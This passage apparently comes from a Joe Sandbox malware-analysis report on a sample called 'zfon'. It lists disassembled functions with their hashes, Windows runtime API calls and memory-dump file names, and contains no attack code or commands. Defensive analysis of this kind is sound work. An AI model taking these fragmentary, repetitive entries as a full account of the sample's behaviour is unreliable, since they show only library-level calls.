                                                                                                                                                                            • Opcode Fuzzy Hash: 2fb25108f35d941593c22e25bba104b268c97b58bb64699d526f95c43bc25dae
                                                                                                                                                                            • Instruction Fuzzy Hash: 9AF04FB5F8C50769EE28B779A58D378A1E7AF417A1FC00C35C14E12E5CEE5C62C88232
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C43
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C5F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C6F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C7F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFE1C8C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 16132b1b97e4afbb32a3792d560562ac31cb19e7eff60c65a0afaa5d06987951
                                                                                                                                                                            • Instruction ID: 407cab928a0a1ea200a271ff80f618e695b8e062b4f827a84e42606bb60f78ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 16132b1b97e4afbb32a3792d560562ac31cb19e7eff60c65a0afaa5d06987951
                                                                                                                                                                            • Instruction Fuzzy Hash: 1FF044E5E4D50764FE28B779A44C37891679F407B1FC04A34C16D236E9EE5C60844132
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7C63
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7C7F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7C8F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7C9F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF79CFF7A8D), ref: 00007FF79CFF7CAC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 1e1325763c204f614580ca28e882b4561ce590b6f5d7c437e7bbf9f77bbfad6d
                                                                                                                                                                            • Instruction ID: 03baf0d1943f20406ebf1e0abc0b09aa58c01e4397b41050dae00eed77f554c4
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e1325763c204f614580ca28e882b4561ce590b6f5d7c437e7bbf9f77bbfad6d
                                                                                                                                                                            • Instruction Fuzzy Hash: 78F044A5E0C50764FD28B778A46D33CF16BDF407B1FD10A35C1AD126E8ED5C20844132
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15A3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15BC
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15CC
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15DC
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFF15E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 3f681eb5713a892da424ea5b97dc0341e4c877ef2987a9e861528f4583824885
                                                                                                                                                                            • Instruction ID: af29c54eb13c8609d218e8b64dd25438812941e43faa4524f49b4a4a1f1d74e8
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f681eb5713a892da424ea5b97dc0341e4c877ef2987a9e861528f4583824885
                                                                                                                                                                            • Instruction Fuzzy Hash: C9F090E5E4D14768FD79B7B5A84D238A1ABEF447B1FC49A34C16E12AD8AF4C20C54232
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA623
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA63F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA64F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA65F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA66C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: fc2c3111614c86b3978751517b6eb494c7d1032bfecd94e764b9329ffff241ad
                                                                                                                                                                            • Instruction ID: 1dc98a5e790d7bd62e6af561ff7d1ebf6da990f907238a29a529fd15bbef877f
                                                                                                                                                                            • Opcode Fuzzy Hash: fc2c3111614c86b3978751517b6eb494c7d1032bfecd94e764b9329ffff241ad
                                                                                                                                                                            • Instruction Fuzzy Hash: C9F04FF5E4C10768ED28B778A84C338A277EF507B1FC04A34C56D12AE8EE5C21848632
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB4403
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB441B
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB442B
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB443B
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB4448
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 72e217726392643e79e687100b577b01b41de6d779231d9bfbbd7ee5620b34e1
                                                                                                                                                                            • Instruction ID: 1ce3d864ea70b5102baa748ddbb596b7a2a8080167c2960c119df6bca864b54d
                                                                                                                                                                            • Opcode Fuzzy Hash: 72e217726392643e79e687100b577b01b41de6d779231d9bfbbd7ee5620b34e1
                                                                                                                                                                            • Instruction Fuzzy Hash: BAF062A5E4C107A4ED28B774A64C238E167EF407B1FD00A35C66D12AD8EF5C64E84233
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD927A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD928F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD929F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD92AF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD92BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: a292d89722aa7e017496ccada6b4d01e5cbe7845519cfa99e775e957023e2368
                                                                                                                                                                            • Instruction ID: 74f42d7f51276f3048fcde546e5c95a3c6d56ac5aca6ad05bf573f2af8d770cf
                                                                                                                                                                            • Opcode Fuzzy Hash: a292d89722aa7e017496ccada6b4d01e5cbe7845519cfa99e775e957023e2368
                                                                                                                                                                            • Instruction Fuzzy Hash: E1F03AA5E4C50766E938B7F5A84C27DB2A3AF457B2FD00A35C16E129DCAF5C21C64232
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD92EA
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD92FF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD930F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD931F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFD932C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 7402652a24f6ac2342940f10915b9c3fc5835fbb4437735f00c634805102aa82
                                                                                                                                                                            • Instruction ID: 923e7d30bcd1afe7d8b571fa1ab0a239cdbe33403dfeee9b2599bd665af67af4
                                                                                                                                                                            • Opcode Fuzzy Hash: 7402652a24f6ac2342940f10915b9c3fc5835fbb4437735f00c634805102aa82
                                                                                                                                                                            • Instruction Fuzzy Hash: 18F090A1D4C007A4ED38B7F5A84C238A167AF407B1FD00735C16D119ECAF5C21D54232
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@$cef_string_map_alloc
                                                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                                                            • API String ID: 1597692744-3788999226
                                                                                                                                                                            • Opcode ID: 1b4c66c2c6d364308aa5f1dc8f150ffe184bf7a47c220a6ef14ea198b7739db5
                                                                                                                                                                            • Instruction ID: f9f42df71555bd82da69bfeea6203a09fc3122e4378449ecba96cb51f414de7e
                                                                                                                                                                            • Opcode Fuzzy Hash: 1b4c66c2c6d364308aa5f1dc8f150ffe184bf7a47c220a6ef14ea198b7739db5
                                                                                                                                                                            • Instruction Fuzzy Hash: C3D16CB3B04A8695EF24DF75C4902BCA3B2EB54B89748C532CA0E17B98DF38D645C350
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B16E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBC1B129EE), ref: 00007FFBC1B16E56
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B1488B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort
                                                                                                                                                                            • String ID: $csm$csm
                                                                                                                                                                            • API String ID: 4206212132-1512788406
                                                                                                                                                                            • Opcode ID: bbeebd1b8dc6bb018cbb3e2007e3860d9f81b2d26c669440cff39126283f8657
                                                                                                                                                                            • Instruction ID: b9a7eb5fbe3862ffbe5365ff661cf2979ea43e69d7e08642d18b436b25ef7a7f
                                                                                                                                                                            • Opcode Fuzzy Hash: bbeebd1b8dc6bb018cbb3e2007e3860d9f81b2d26c669440cff39126283f8657
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B71D4BA90868186D7218F35D04037EBBA1FB45BC9F25A135DE8E27A89CF3CD551CB40
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B16E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBC1B129EE), ref: 00007FFBC1B16E56
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B145DB
                                                                                                                                                                            • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFBC1B145EB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                            • API String ID: 4108983575-3733052814
                                                                                                                                                                            • Opcode ID: 73f04ae2f99dd10f8d311029635b97aaf7a618db7278283a49f5dcc94daca835
                                                                                                                                                                            • Instruction ID: 2ecc7d53aae2a5e69aa467f3535d051b1286f5a0059ca9cfdc44fde0da203a0d
                                                                                                                                                                            • Opcode Fuzzy Hash: 73f04ae2f99dd10f8d311029635b97aaf7a618db7278283a49f5dcc94daca835
                                                                                                                                                                            • Instruction Fuzzy Hash: 3451A5BA908282C6EB648F31D54436AB7A0FB54B98F256135EA4E67BD5CF3CE451CF00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CreateFrameInfo__except_validate_context_record
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 444109036-1018135373
                                                                                                                                                                            • Opcode ID: 1e96529f35874369624db110d262335690731295dc4eb4a79234829db8fb8cf6
                                                                                                                                                                            • Instruction ID: 0bc87a4c74b87c5f6593549739954a7b88bfa0ff7258da919587549d80d14c62
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e96529f35874369624db110d262335690731295dc4eb4a79234829db8fb8cf6
                                                                                                                                                                            • Instruction Fuzzy Hash: F0513BFA619B8186D760EF26E0C026E77A8FB89B94F106134EA8D17B55CF38E451CF00
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B3D5CD), ref: 00007FFBC1B39F14
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FFBC1B3D5CD), ref: 00007FFBC1B39F52
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFBC1B3D5CD), ref: 00007FFBC1B39F5C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
